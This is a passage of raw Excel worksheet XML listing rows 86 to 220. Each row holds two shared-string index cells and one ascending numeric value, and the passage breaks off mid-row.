      <c r="B86" s="14" t="s">
        <v>7340</v>
      </c>
      <c r="C86" s="15">
        <v>29852</v>
      </c>
    </row>
    <row r="87" spans="1:3">
      <c r="A87" s="28" t="s">
        <v>18923</v>
      </c>
      <c r="B87" s="14" t="s">
        <v>7341</v>
      </c>
      <c r="C87" s="15">
        <v>30332</v>
      </c>
    </row>
    <row r="88" spans="1:3">
      <c r="A88" s="28" t="s">
        <v>18924</v>
      </c>
      <c r="B88" s="14" t="s">
        <v>7342</v>
      </c>
      <c r="C88" s="15">
        <v>30340</v>
      </c>
    </row>
    <row r="89" spans="1:3">
      <c r="A89" s="28" t="s">
        <v>18925</v>
      </c>
      <c r="B89" s="14" t="s">
        <v>7343</v>
      </c>
      <c r="C89" s="15">
        <v>31000</v>
      </c>
    </row>
    <row r="90" spans="1:3">
      <c r="A90" s="28" t="s">
        <v>18926</v>
      </c>
      <c r="B90" s="14" t="s">
        <v>7344</v>
      </c>
      <c r="C90" s="15">
        <v>31700</v>
      </c>
    </row>
    <row r="91" spans="1:3">
      <c r="A91" s="28" t="s">
        <v>18927</v>
      </c>
      <c r="B91" s="14" t="s">
        <v>7345</v>
      </c>
      <c r="C91" s="15">
        <v>32070</v>
      </c>
    </row>
    <row r="92" spans="1:3">
      <c r="A92" s="28" t="s">
        <v>18928</v>
      </c>
      <c r="B92" s="14" t="s">
        <v>7346</v>
      </c>
      <c r="C92" s="15">
        <v>32150</v>
      </c>
    </row>
    <row r="93" spans="1:3">
      <c r="A93" s="28" t="s">
        <v>18929</v>
      </c>
      <c r="B93" s="14" t="s">
        <v>7347</v>
      </c>
      <c r="C93" s="15">
        <v>32341</v>
      </c>
    </row>
    <row r="94" spans="1:3">
      <c r="A94" s="28" t="s">
        <v>18930</v>
      </c>
      <c r="B94" s="14" t="s">
        <v>7348</v>
      </c>
      <c r="C94" s="15">
        <v>32606</v>
      </c>
    </row>
    <row r="95" spans="1:3">
      <c r="A95" s="28" t="s">
        <v>18931</v>
      </c>
      <c r="B95" s="14" t="s">
        <v>7349</v>
      </c>
      <c r="C95" s="15">
        <v>32850</v>
      </c>
    </row>
    <row r="96" spans="1:3">
      <c r="A96" s="28" t="s">
        <v>18932</v>
      </c>
      <c r="B96" s="14" t="s">
        <v>7350</v>
      </c>
      <c r="C96" s="15">
        <v>32871</v>
      </c>
    </row>
    <row r="97" spans="1:3">
      <c r="A97" s="28" t="s">
        <v>18933</v>
      </c>
      <c r="B97" s="14" t="s">
        <v>7351</v>
      </c>
      <c r="C97" s="15">
        <v>35211</v>
      </c>
    </row>
    <row r="98" spans="1:3">
      <c r="A98" s="28" t="s">
        <v>18934</v>
      </c>
      <c r="B98" s="14" t="s">
        <v>7352</v>
      </c>
      <c r="C98" s="15">
        <v>35451</v>
      </c>
    </row>
    <row r="99" spans="1:3">
      <c r="A99" s="28" t="s">
        <v>18935</v>
      </c>
      <c r="B99" s="14" t="s">
        <v>7353</v>
      </c>
      <c r="C99" s="15">
        <v>35460</v>
      </c>
    </row>
    <row r="100" spans="1:3">
      <c r="A100" s="28" t="s">
        <v>18936</v>
      </c>
      <c r="B100" s="14" t="s">
        <v>7354</v>
      </c>
      <c r="C100" s="15">
        <v>35480</v>
      </c>
    </row>
    <row r="101" spans="1:3">
      <c r="A101" s="28" t="s">
        <v>18937</v>
      </c>
      <c r="B101" s="14" t="s">
        <v>7355</v>
      </c>
      <c r="C101" s="15">
        <v>36249</v>
      </c>
    </row>
    <row r="102" spans="1:3">
      <c r="A102" s="28" t="s">
        <v>18938</v>
      </c>
      <c r="B102" s="14" t="s">
        <v>7356</v>
      </c>
      <c r="C102" s="15">
        <v>36299</v>
      </c>
    </row>
    <row r="103" spans="1:3">
      <c r="A103" s="28" t="s">
        <v>18939</v>
      </c>
      <c r="B103" s="14" t="s">
        <v>7357</v>
      </c>
      <c r="C103" s="15">
        <v>38032</v>
      </c>
    </row>
    <row r="104" spans="1:3">
      <c r="A104" s="28" t="s">
        <v>18940</v>
      </c>
      <c r="B104" s="14" t="s">
        <v>7358</v>
      </c>
      <c r="C104" s="15">
        <v>38080</v>
      </c>
    </row>
    <row r="105" spans="1:3">
      <c r="A105" s="28" t="s">
        <v>18941</v>
      </c>
      <c r="B105" s="14" t="s">
        <v>7359</v>
      </c>
      <c r="C105" s="15">
        <v>38991</v>
      </c>
    </row>
    <row r="106" spans="1:3">
      <c r="A106" s="28" t="s">
        <v>18942</v>
      </c>
      <c r="B106" s="14" t="s">
        <v>7360</v>
      </c>
      <c r="C106" s="15">
        <v>39968</v>
      </c>
    </row>
    <row r="107" spans="1:3">
      <c r="A107" s="28" t="s">
        <v>364</v>
      </c>
      <c r="B107" s="14" t="s">
        <v>7361</v>
      </c>
      <c r="C107" s="15">
        <v>41860</v>
      </c>
    </row>
    <row r="108" spans="1:3">
      <c r="A108" s="28" t="s">
        <v>18943</v>
      </c>
      <c r="B108" s="14" t="s">
        <v>7362</v>
      </c>
      <c r="C108" s="15">
        <v>45010</v>
      </c>
    </row>
    <row r="109" spans="1:3">
      <c r="A109" s="28" t="s">
        <v>18944</v>
      </c>
      <c r="B109" s="14" t="s">
        <v>7363</v>
      </c>
      <c r="C109" s="15">
        <v>45040</v>
      </c>
    </row>
    <row r="110" spans="1:3">
      <c r="A110" s="28" t="s">
        <v>18945</v>
      </c>
      <c r="B110" s="14" t="s">
        <v>7364</v>
      </c>
      <c r="C110" s="15">
        <v>45062</v>
      </c>
    </row>
    <row r="111" spans="1:3">
      <c r="A111" s="28" t="s">
        <v>18946</v>
      </c>
      <c r="B111" s="14" t="s">
        <v>7365</v>
      </c>
      <c r="C111" s="15">
        <v>45066</v>
      </c>
    </row>
    <row r="112" spans="1:3">
      <c r="A112" s="28" t="s">
        <v>18947</v>
      </c>
      <c r="B112" s="14" t="s">
        <v>7366</v>
      </c>
      <c r="C112" s="15">
        <v>45092</v>
      </c>
    </row>
    <row r="113" spans="1:3">
      <c r="A113" s="28" t="s">
        <v>18948</v>
      </c>
      <c r="B113" s="14" t="s">
        <v>7367</v>
      </c>
      <c r="C113" s="15">
        <v>45097</v>
      </c>
    </row>
    <row r="114" spans="1:3">
      <c r="A114" s="28" t="s">
        <v>18949</v>
      </c>
      <c r="B114" s="14" t="s">
        <v>7368</v>
      </c>
      <c r="C114" s="15">
        <v>47020</v>
      </c>
    </row>
    <row r="115" spans="1:3">
      <c r="A115" s="28" t="s">
        <v>18950</v>
      </c>
      <c r="B115" s="14" t="s">
        <v>7369</v>
      </c>
      <c r="C115" s="15">
        <v>47790</v>
      </c>
    </row>
    <row r="116" spans="1:3">
      <c r="A116" s="28" t="s">
        <v>18951</v>
      </c>
      <c r="B116" s="14" t="s">
        <v>7370</v>
      </c>
      <c r="C116" s="15">
        <v>47798</v>
      </c>
    </row>
    <row r="117" spans="1:3">
      <c r="A117" s="28" t="s">
        <v>18952</v>
      </c>
      <c r="B117" s="14" t="s">
        <v>7371</v>
      </c>
      <c r="C117" s="15">
        <v>49020</v>
      </c>
    </row>
    <row r="118" spans="1:3">
      <c r="A118" s="28" t="s">
        <v>18953</v>
      </c>
      <c r="B118" s="14" t="s">
        <v>7372</v>
      </c>
      <c r="C118" s="15">
        <v>50450</v>
      </c>
    </row>
    <row r="119" spans="1:3">
      <c r="A119" s="28" t="s">
        <v>18954</v>
      </c>
      <c r="B119" s="14" t="s">
        <v>7372</v>
      </c>
      <c r="C119" s="15">
        <v>50451</v>
      </c>
    </row>
    <row r="120" spans="1:3">
      <c r="A120" s="28" t="s">
        <v>18955</v>
      </c>
      <c r="B120" s="14" t="s">
        <v>7373</v>
      </c>
      <c r="C120" s="15">
        <v>50500</v>
      </c>
    </row>
    <row r="121" spans="1:3">
      <c r="A121" s="28" t="s">
        <v>18956</v>
      </c>
      <c r="B121" s="14" t="s">
        <v>7374</v>
      </c>
      <c r="C121" s="15">
        <v>55031</v>
      </c>
    </row>
    <row r="122" spans="1:3">
      <c r="A122" s="28" t="s">
        <v>18957</v>
      </c>
      <c r="B122" s="14" t="s">
        <v>7375</v>
      </c>
      <c r="C122" s="15">
        <v>56000</v>
      </c>
    </row>
    <row r="123" spans="1:3">
      <c r="A123" s="28" t="s">
        <v>18958</v>
      </c>
      <c r="B123" s="14" t="s">
        <v>7376</v>
      </c>
      <c r="C123" s="15">
        <v>56029</v>
      </c>
    </row>
    <row r="124" spans="1:3">
      <c r="A124" s="28" t="s">
        <v>18959</v>
      </c>
      <c r="B124" s="14" t="s">
        <v>7377</v>
      </c>
      <c r="C124" s="15">
        <v>56050</v>
      </c>
    </row>
    <row r="125" spans="1:3">
      <c r="A125" s="28" t="s">
        <v>18960</v>
      </c>
      <c r="B125" s="14" t="s">
        <v>7378</v>
      </c>
      <c r="C125" s="15">
        <v>56060</v>
      </c>
    </row>
    <row r="126" spans="1:3">
      <c r="A126" s="28" t="s">
        <v>612</v>
      </c>
      <c r="B126" s="14" t="s">
        <v>7379</v>
      </c>
      <c r="C126" s="15">
        <v>56076</v>
      </c>
    </row>
    <row r="127" spans="1:3">
      <c r="A127" s="28" t="s">
        <v>18961</v>
      </c>
      <c r="B127" s="14" t="s">
        <v>7380</v>
      </c>
      <c r="C127" s="15">
        <v>56111</v>
      </c>
    </row>
    <row r="128" spans="1:3">
      <c r="A128" s="28" t="s">
        <v>18962</v>
      </c>
      <c r="B128" s="14" t="s">
        <v>7381</v>
      </c>
      <c r="C128" s="15">
        <v>56131</v>
      </c>
    </row>
    <row r="129" spans="1:3">
      <c r="A129" s="28" t="s">
        <v>506</v>
      </c>
      <c r="B129" s="14" t="s">
        <v>7382</v>
      </c>
      <c r="C129" s="15">
        <v>56135</v>
      </c>
    </row>
    <row r="130" spans="1:3">
      <c r="A130" s="28" t="s">
        <v>18963</v>
      </c>
      <c r="B130" s="14" t="s">
        <v>7383</v>
      </c>
      <c r="C130" s="15">
        <v>56200</v>
      </c>
    </row>
    <row r="131" spans="1:3">
      <c r="A131" s="28" t="s">
        <v>18964</v>
      </c>
      <c r="B131" s="14" t="s">
        <v>7384</v>
      </c>
      <c r="C131" s="15">
        <v>56207</v>
      </c>
    </row>
    <row r="132" spans="1:3">
      <c r="A132" s="28" t="s">
        <v>18965</v>
      </c>
      <c r="B132" s="14" t="s">
        <v>7385</v>
      </c>
      <c r="C132" s="15">
        <v>56210</v>
      </c>
    </row>
    <row r="133" spans="1:3">
      <c r="A133" s="28" t="s">
        <v>178</v>
      </c>
      <c r="B133" s="14" t="s">
        <v>7386</v>
      </c>
      <c r="C133" s="15">
        <v>56211</v>
      </c>
    </row>
    <row r="134" spans="1:3">
      <c r="A134" s="28" t="s">
        <v>18966</v>
      </c>
      <c r="B134" s="14" t="s">
        <v>7387</v>
      </c>
      <c r="C134" s="15">
        <v>56239</v>
      </c>
    </row>
    <row r="135" spans="1:3">
      <c r="A135" s="28" t="s">
        <v>18967</v>
      </c>
      <c r="B135" s="14" t="s">
        <v>7388</v>
      </c>
      <c r="C135" s="15">
        <v>56715</v>
      </c>
    </row>
    <row r="136" spans="1:3">
      <c r="A136" s="28" t="s">
        <v>18968</v>
      </c>
      <c r="B136" s="14" t="s">
        <v>7389</v>
      </c>
      <c r="C136" s="15">
        <v>56750</v>
      </c>
    </row>
    <row r="137" spans="1:3">
      <c r="A137" s="28" t="s">
        <v>18969</v>
      </c>
      <c r="B137" s="14" t="s">
        <v>7390</v>
      </c>
      <c r="C137" s="15">
        <v>57000</v>
      </c>
    </row>
    <row r="138" spans="1:3">
      <c r="A138" s="28" t="s">
        <v>18970</v>
      </c>
      <c r="B138" s="14" t="s">
        <v>7391</v>
      </c>
      <c r="C138" s="15">
        <v>57001</v>
      </c>
    </row>
    <row r="139" spans="1:3" ht="25.5">
      <c r="A139" s="28" t="s">
        <v>18971</v>
      </c>
      <c r="B139" s="14" t="s">
        <v>7392</v>
      </c>
      <c r="C139" s="15">
        <v>57009</v>
      </c>
    </row>
    <row r="140" spans="1:3">
      <c r="A140" s="28" t="s">
        <v>18972</v>
      </c>
      <c r="B140" s="14" t="s">
        <v>7393</v>
      </c>
      <c r="C140" s="15">
        <v>57010</v>
      </c>
    </row>
    <row r="141" spans="1:3">
      <c r="A141" s="28" t="s">
        <v>18973</v>
      </c>
      <c r="B141" s="14" t="s">
        <v>7394</v>
      </c>
      <c r="C141" s="15">
        <v>57012</v>
      </c>
    </row>
    <row r="142" spans="1:3">
      <c r="A142" s="28" t="s">
        <v>18974</v>
      </c>
      <c r="B142" s="14" t="s">
        <v>7395</v>
      </c>
      <c r="C142" s="15">
        <v>57030</v>
      </c>
    </row>
    <row r="143" spans="1:3">
      <c r="A143" s="28" t="s">
        <v>18975</v>
      </c>
      <c r="B143" s="14" t="s">
        <v>7396</v>
      </c>
      <c r="C143" s="15">
        <v>57040</v>
      </c>
    </row>
    <row r="144" spans="1:3">
      <c r="A144" s="28" t="s">
        <v>18976</v>
      </c>
      <c r="B144" s="14" t="s">
        <v>7397</v>
      </c>
      <c r="C144" s="15">
        <v>57060</v>
      </c>
    </row>
    <row r="145" spans="1:3">
      <c r="A145" s="28" t="s">
        <v>18977</v>
      </c>
      <c r="B145" s="14" t="s">
        <v>7398</v>
      </c>
      <c r="C145" s="15">
        <v>57070</v>
      </c>
    </row>
    <row r="146" spans="1:3">
      <c r="A146" s="28" t="s">
        <v>18978</v>
      </c>
      <c r="B146" s="14" t="s">
        <v>7399</v>
      </c>
      <c r="C146" s="15">
        <v>57080</v>
      </c>
    </row>
    <row r="147" spans="1:3">
      <c r="A147" s="28" t="s">
        <v>18979</v>
      </c>
      <c r="B147" s="14" t="s">
        <v>7400</v>
      </c>
      <c r="C147" s="15">
        <v>57082</v>
      </c>
    </row>
    <row r="148" spans="1:3">
      <c r="A148" s="28" t="s">
        <v>18980</v>
      </c>
      <c r="B148" s="14" t="s">
        <v>7401</v>
      </c>
      <c r="C148" s="15">
        <v>57090</v>
      </c>
    </row>
    <row r="149" spans="1:3">
      <c r="A149" s="28" t="s">
        <v>18981</v>
      </c>
      <c r="B149" s="14" t="s">
        <v>7402</v>
      </c>
      <c r="C149" s="15">
        <v>57140</v>
      </c>
    </row>
    <row r="150" spans="1:3">
      <c r="A150" s="28" t="s">
        <v>18982</v>
      </c>
      <c r="B150" s="14" t="s">
        <v>7403</v>
      </c>
      <c r="C150" s="15">
        <v>57149</v>
      </c>
    </row>
    <row r="151" spans="1:3">
      <c r="A151" s="28" t="s">
        <v>18983</v>
      </c>
      <c r="B151" s="14" t="s">
        <v>7404</v>
      </c>
      <c r="C151" s="15">
        <v>57195</v>
      </c>
    </row>
    <row r="152" spans="1:3">
      <c r="A152" s="28" t="s">
        <v>18984</v>
      </c>
      <c r="B152" s="14" t="s">
        <v>7405</v>
      </c>
      <c r="C152" s="15">
        <v>57310</v>
      </c>
    </row>
    <row r="153" spans="1:3">
      <c r="A153" s="28" t="s">
        <v>18984</v>
      </c>
      <c r="B153" s="14" t="s">
        <v>7405</v>
      </c>
      <c r="C153" s="15">
        <v>57320</v>
      </c>
    </row>
    <row r="154" spans="1:3">
      <c r="A154" s="28" t="s">
        <v>18984</v>
      </c>
      <c r="B154" s="14" t="s">
        <v>7405</v>
      </c>
      <c r="C154" s="15">
        <v>57326</v>
      </c>
    </row>
    <row r="155" spans="1:3">
      <c r="A155" s="28" t="s">
        <v>18985</v>
      </c>
      <c r="B155" s="14" t="s">
        <v>7406</v>
      </c>
      <c r="C155" s="15">
        <v>57363</v>
      </c>
    </row>
    <row r="156" spans="1:3">
      <c r="A156" s="28" t="s">
        <v>18986</v>
      </c>
      <c r="B156" s="14" t="s">
        <v>7407</v>
      </c>
      <c r="C156" s="15">
        <v>57364</v>
      </c>
    </row>
    <row r="157" spans="1:3">
      <c r="A157" s="28" t="s">
        <v>18987</v>
      </c>
      <c r="B157" s="14" t="s">
        <v>7408</v>
      </c>
      <c r="C157" s="15">
        <v>57390</v>
      </c>
    </row>
    <row r="158" spans="1:3">
      <c r="A158" s="28" t="s">
        <v>18988</v>
      </c>
      <c r="B158" s="14" t="s">
        <v>7409</v>
      </c>
      <c r="C158" s="15">
        <v>57405</v>
      </c>
    </row>
    <row r="159" spans="1:3">
      <c r="A159" s="28" t="s">
        <v>18984</v>
      </c>
      <c r="B159" s="14" t="s">
        <v>7405</v>
      </c>
      <c r="C159" s="15">
        <v>57420</v>
      </c>
    </row>
    <row r="160" spans="1:3">
      <c r="A160" s="28" t="s">
        <v>18984</v>
      </c>
      <c r="B160" s="14" t="s">
        <v>7405</v>
      </c>
      <c r="C160" s="15">
        <v>57421</v>
      </c>
    </row>
    <row r="161" spans="1:3">
      <c r="A161" s="28" t="s">
        <v>18984</v>
      </c>
      <c r="B161" s="14" t="s">
        <v>7405</v>
      </c>
      <c r="C161" s="15">
        <v>57422</v>
      </c>
    </row>
    <row r="162" spans="1:3">
      <c r="A162" s="28" t="s">
        <v>18984</v>
      </c>
      <c r="B162" s="14" t="s">
        <v>7405</v>
      </c>
      <c r="C162" s="15">
        <v>57423</v>
      </c>
    </row>
    <row r="163" spans="1:3">
      <c r="A163" s="28" t="s">
        <v>18988</v>
      </c>
      <c r="B163" s="14" t="s">
        <v>7409</v>
      </c>
      <c r="C163" s="15">
        <v>57505</v>
      </c>
    </row>
    <row r="164" spans="1:3">
      <c r="A164" s="28" t="s">
        <v>18984</v>
      </c>
      <c r="B164" s="14" t="s">
        <v>7405</v>
      </c>
      <c r="C164" s="15">
        <v>57530</v>
      </c>
    </row>
    <row r="165" spans="1:3">
      <c r="A165" s="28" t="s">
        <v>18989</v>
      </c>
      <c r="B165" s="14" t="s">
        <v>7405</v>
      </c>
      <c r="C165" s="15">
        <v>57550</v>
      </c>
    </row>
    <row r="166" spans="1:3">
      <c r="A166" s="28" t="s">
        <v>18990</v>
      </c>
      <c r="B166" s="14" t="s">
        <v>7410</v>
      </c>
      <c r="C166" s="15">
        <v>57600</v>
      </c>
    </row>
    <row r="167" spans="1:3">
      <c r="A167" s="28" t="s">
        <v>18991</v>
      </c>
      <c r="B167" s="14" t="s">
        <v>7411</v>
      </c>
      <c r="C167" s="15">
        <v>57700</v>
      </c>
    </row>
    <row r="168" spans="1:3">
      <c r="A168" s="28" t="s">
        <v>18992</v>
      </c>
      <c r="B168" s="14" t="s">
        <v>7412</v>
      </c>
      <c r="C168" s="15">
        <v>57718</v>
      </c>
    </row>
    <row r="169" spans="1:3">
      <c r="A169" s="28" t="s">
        <v>18993</v>
      </c>
      <c r="B169" s="14" t="s">
        <v>7413</v>
      </c>
      <c r="C169" s="15">
        <v>57750</v>
      </c>
    </row>
    <row r="170" spans="1:3">
      <c r="A170" s="28" t="s">
        <v>18994</v>
      </c>
      <c r="B170" s="14" t="s">
        <v>7414</v>
      </c>
      <c r="C170" s="15">
        <v>57799</v>
      </c>
    </row>
    <row r="171" spans="1:3">
      <c r="A171" s="28" t="s">
        <v>18995</v>
      </c>
      <c r="B171" s="14" t="s">
        <v>7415</v>
      </c>
      <c r="C171" s="15">
        <v>57800</v>
      </c>
    </row>
    <row r="172" spans="1:3">
      <c r="A172" s="28" t="s">
        <v>18996</v>
      </c>
      <c r="B172" s="14" t="s">
        <v>7416</v>
      </c>
      <c r="C172" s="15">
        <v>57850</v>
      </c>
    </row>
    <row r="173" spans="1:3">
      <c r="A173" s="28" t="s">
        <v>18997</v>
      </c>
      <c r="B173" s="14" t="s">
        <v>7417</v>
      </c>
      <c r="C173" s="15">
        <v>57860</v>
      </c>
    </row>
    <row r="174" spans="1:3">
      <c r="A174" s="28" t="s">
        <v>18998</v>
      </c>
      <c r="B174" s="14" t="s">
        <v>7418</v>
      </c>
      <c r="C174" s="15">
        <v>58081</v>
      </c>
    </row>
    <row r="175" spans="1:3">
      <c r="A175" s="28" t="s">
        <v>18999</v>
      </c>
      <c r="B175" s="14" t="s">
        <v>7419</v>
      </c>
      <c r="C175" s="15">
        <v>59950</v>
      </c>
    </row>
    <row r="176" spans="1:3">
      <c r="A176" s="28" t="s">
        <v>19000</v>
      </c>
      <c r="B176" s="14" t="s">
        <v>7420</v>
      </c>
      <c r="C176" s="15">
        <v>60950</v>
      </c>
    </row>
    <row r="177" spans="1:3">
      <c r="A177" s="28" t="s">
        <v>19001</v>
      </c>
      <c r="B177" s="14" t="s">
        <v>7421</v>
      </c>
      <c r="C177" s="15">
        <v>61810</v>
      </c>
    </row>
    <row r="178" spans="1:3">
      <c r="A178" s="28" t="s">
        <v>19002</v>
      </c>
      <c r="B178" s="14" t="s">
        <v>7422</v>
      </c>
      <c r="C178" s="15">
        <v>61819</v>
      </c>
    </row>
    <row r="179" spans="1:3">
      <c r="A179" s="28" t="s">
        <v>19003</v>
      </c>
      <c r="B179" s="14" t="s">
        <v>7423</v>
      </c>
      <c r="C179" s="15">
        <v>61951</v>
      </c>
    </row>
    <row r="180" spans="1:3">
      <c r="A180" s="28" t="s">
        <v>19004</v>
      </c>
      <c r="B180" s="14" t="s">
        <v>7424</v>
      </c>
      <c r="C180" s="15">
        <v>62958</v>
      </c>
    </row>
    <row r="181" spans="1:3">
      <c r="A181" s="28" t="s">
        <v>19005</v>
      </c>
      <c r="B181" s="14" t="s">
        <v>7425</v>
      </c>
      <c r="C181" s="15">
        <v>64956</v>
      </c>
    </row>
    <row r="182" spans="1:3">
      <c r="A182" s="28" t="s">
        <v>19006</v>
      </c>
      <c r="B182" s="14" t="s">
        <v>7426</v>
      </c>
      <c r="C182" s="15">
        <v>64990</v>
      </c>
    </row>
    <row r="183" spans="1:3">
      <c r="A183" s="28" t="s">
        <v>19007</v>
      </c>
      <c r="B183" s="14" t="s">
        <v>7427</v>
      </c>
      <c r="C183" s="15">
        <v>66950</v>
      </c>
    </row>
    <row r="184" spans="1:3">
      <c r="A184" s="28" t="s">
        <v>19008</v>
      </c>
      <c r="B184" s="14" t="s">
        <v>7428</v>
      </c>
      <c r="C184" s="15">
        <v>68000</v>
      </c>
    </row>
    <row r="185" spans="1:3">
      <c r="A185" s="28" t="s">
        <v>19009</v>
      </c>
      <c r="B185" s="14" t="s">
        <v>7429</v>
      </c>
      <c r="C185" s="15">
        <v>68015</v>
      </c>
    </row>
    <row r="186" spans="1:3">
      <c r="A186" s="28" t="s">
        <v>19010</v>
      </c>
      <c r="B186" s="14" t="s">
        <v>7430</v>
      </c>
      <c r="C186" s="15">
        <v>68022</v>
      </c>
    </row>
    <row r="187" spans="1:3">
      <c r="A187" s="28" t="s">
        <v>19011</v>
      </c>
      <c r="B187" s="14" t="s">
        <v>7431</v>
      </c>
      <c r="C187" s="15">
        <v>68080</v>
      </c>
    </row>
    <row r="188" spans="1:3">
      <c r="A188" s="28" t="s">
        <v>19012</v>
      </c>
      <c r="B188" s="14" t="s">
        <v>7432</v>
      </c>
      <c r="C188" s="15">
        <v>68100</v>
      </c>
    </row>
    <row r="189" spans="1:3">
      <c r="A189" s="28" t="s">
        <v>19013</v>
      </c>
      <c r="B189" s="14" t="s">
        <v>7433</v>
      </c>
      <c r="C189" s="15">
        <v>68211</v>
      </c>
    </row>
    <row r="190" spans="1:3">
      <c r="A190" s="28" t="s">
        <v>19014</v>
      </c>
      <c r="B190" s="14" t="s">
        <v>7434</v>
      </c>
      <c r="C190" s="15">
        <v>68821</v>
      </c>
    </row>
    <row r="191" spans="1:3">
      <c r="A191" s="28" t="s">
        <v>19015</v>
      </c>
      <c r="B191" s="14" t="s">
        <v>7435</v>
      </c>
      <c r="C191" s="15">
        <v>68855</v>
      </c>
    </row>
    <row r="192" spans="1:3">
      <c r="A192" s="28" t="s">
        <v>19016</v>
      </c>
      <c r="B192" s="14" t="s">
        <v>7436</v>
      </c>
      <c r="C192" s="15">
        <v>68874</v>
      </c>
    </row>
    <row r="193" spans="1:3">
      <c r="A193" s="28" t="s">
        <v>19017</v>
      </c>
      <c r="B193" s="14" t="s">
        <v>7437</v>
      </c>
      <c r="C193" s="15">
        <v>68894</v>
      </c>
    </row>
    <row r="194" spans="1:3">
      <c r="A194" s="28" t="s">
        <v>19018</v>
      </c>
      <c r="B194" s="14" t="s">
        <v>7438</v>
      </c>
      <c r="C194" s="15">
        <v>69000</v>
      </c>
    </row>
    <row r="195" spans="1:3">
      <c r="A195" s="28" t="s">
        <v>19019</v>
      </c>
      <c r="B195" s="14" t="s">
        <v>7439</v>
      </c>
      <c r="C195" s="15">
        <v>69312</v>
      </c>
    </row>
    <row r="196" spans="1:3">
      <c r="A196" s="28" t="s">
        <v>19020</v>
      </c>
      <c r="B196" s="14" t="s">
        <v>7440</v>
      </c>
      <c r="C196" s="15">
        <v>69314</v>
      </c>
    </row>
    <row r="197" spans="1:3">
      <c r="A197" s="28" t="s">
        <v>19021</v>
      </c>
      <c r="B197" s="14" t="s">
        <v>7441</v>
      </c>
      <c r="C197" s="15">
        <v>69550</v>
      </c>
    </row>
    <row r="198" spans="1:3">
      <c r="A198" s="28" t="s">
        <v>19022</v>
      </c>
      <c r="B198" s="14" t="s">
        <v>7442</v>
      </c>
      <c r="C198" s="15">
        <v>69559</v>
      </c>
    </row>
    <row r="199" spans="1:3">
      <c r="A199" s="28" t="s">
        <v>19023</v>
      </c>
      <c r="B199" s="14" t="s">
        <v>7443</v>
      </c>
      <c r="C199" s="15">
        <v>69560</v>
      </c>
    </row>
    <row r="200" spans="1:3">
      <c r="A200" s="28" t="s">
        <v>19024</v>
      </c>
      <c r="B200" s="14" t="s">
        <v>7444</v>
      </c>
      <c r="C200" s="15">
        <v>69590</v>
      </c>
    </row>
    <row r="201" spans="1:3">
      <c r="A201" s="28" t="s">
        <v>19025</v>
      </c>
      <c r="B201" s="14" t="s">
        <v>7445</v>
      </c>
      <c r="C201" s="15">
        <v>69591</v>
      </c>
    </row>
    <row r="202" spans="1:3">
      <c r="A202" s="28" t="s">
        <v>19026</v>
      </c>
      <c r="B202" s="14" t="s">
        <v>7446</v>
      </c>
      <c r="C202" s="15">
        <v>69597</v>
      </c>
    </row>
    <row r="203" spans="1:3">
      <c r="A203" s="28" t="s">
        <v>19027</v>
      </c>
      <c r="B203" s="14" t="s">
        <v>7429</v>
      </c>
      <c r="C203" s="15">
        <v>69599</v>
      </c>
    </row>
    <row r="204" spans="1:3">
      <c r="A204" s="28" t="s">
        <v>19028</v>
      </c>
      <c r="B204" s="14" t="s">
        <v>7447</v>
      </c>
      <c r="C204" s="15">
        <v>69649</v>
      </c>
    </row>
    <row r="205" spans="1:3">
      <c r="A205" s="28" t="s">
        <v>19029</v>
      </c>
      <c r="B205" s="14" t="s">
        <v>7448</v>
      </c>
      <c r="C205" s="15">
        <v>69670</v>
      </c>
    </row>
    <row r="206" spans="1:3">
      <c r="A206" s="28" t="s">
        <v>19030</v>
      </c>
      <c r="B206" s="14" t="s">
        <v>7449</v>
      </c>
      <c r="C206" s="15">
        <v>69771</v>
      </c>
    </row>
    <row r="207" spans="1:3">
      <c r="A207" s="28" t="s">
        <v>19031</v>
      </c>
      <c r="B207" s="14" t="s">
        <v>7450</v>
      </c>
      <c r="C207" s="15">
        <v>69775</v>
      </c>
    </row>
    <row r="208" spans="1:3">
      <c r="A208" s="28" t="s">
        <v>19032</v>
      </c>
      <c r="B208" s="14" t="s">
        <v>7451</v>
      </c>
      <c r="C208" s="15">
        <v>69859</v>
      </c>
    </row>
    <row r="209" spans="1:3">
      <c r="A209" s="28" t="s">
        <v>19033</v>
      </c>
      <c r="B209" s="14" t="s">
        <v>7452</v>
      </c>
      <c r="C209" s="15">
        <v>69883</v>
      </c>
    </row>
    <row r="210" spans="1:3">
      <c r="A210" s="28" t="s">
        <v>19034</v>
      </c>
      <c r="B210" s="14" t="s">
        <v>7453</v>
      </c>
      <c r="C210" s="15">
        <v>69888</v>
      </c>
    </row>
    <row r="211" spans="1:3">
      <c r="A211" s="28" t="s">
        <v>19035</v>
      </c>
      <c r="B211" s="14" t="s">
        <v>7454</v>
      </c>
      <c r="C211" s="15">
        <v>69891</v>
      </c>
    </row>
    <row r="212" spans="1:3">
      <c r="A212" s="28" t="s">
        <v>19036</v>
      </c>
      <c r="B212" s="14" t="s">
        <v>7455</v>
      </c>
      <c r="C212" s="15">
        <v>71110</v>
      </c>
    </row>
    <row r="213" spans="1:3">
      <c r="A213" s="28" t="s">
        <v>19037</v>
      </c>
      <c r="B213" s="14" t="s">
        <v>7456</v>
      </c>
      <c r="C213" s="15">
        <v>72013</v>
      </c>
    </row>
    <row r="214" spans="1:3">
      <c r="A214" s="28" t="s">
        <v>19038</v>
      </c>
      <c r="B214" s="14" t="s">
        <v>7457</v>
      </c>
      <c r="C214" s="15">
        <v>72020</v>
      </c>
    </row>
    <row r="215" spans="1:3">
      <c r="A215" s="28" t="s">
        <v>19039</v>
      </c>
      <c r="B215" s="14" t="s">
        <v>7458</v>
      </c>
      <c r="C215" s="15">
        <v>72072</v>
      </c>
    </row>
    <row r="216" spans="1:3">
      <c r="A216" s="28" t="s">
        <v>19040</v>
      </c>
      <c r="B216" s="14" t="s">
        <v>7459</v>
      </c>
      <c r="C216" s="15">
        <v>72111</v>
      </c>
    </row>
    <row r="217" spans="1:3">
      <c r="A217" s="28" t="s">
        <v>19041</v>
      </c>
      <c r="B217" s="14" t="s">
        <v>7460</v>
      </c>
      <c r="C217" s="15">
        <v>72131</v>
      </c>
    </row>
    <row r="218" spans="1:3">
      <c r="A218" s="28" t="s">
        <v>19042</v>
      </c>
      <c r="B218" s="14" t="s">
        <v>7461</v>
      </c>
      <c r="C218" s="15">
        <v>73208</v>
      </c>
    </row>
    <row r="219" spans="1:3">
      <c r="A219" s="28" t="s">
        <v>19043</v>
      </c>
      <c r="B219" s="14" t="s">
        <v>7462</v>
      </c>
      <c r="C219" s="15">
        <v>73505</v>
      </c>
    </row>
    <row r="220" spans="1:3">
      <c r="A220" s="28" t="s">
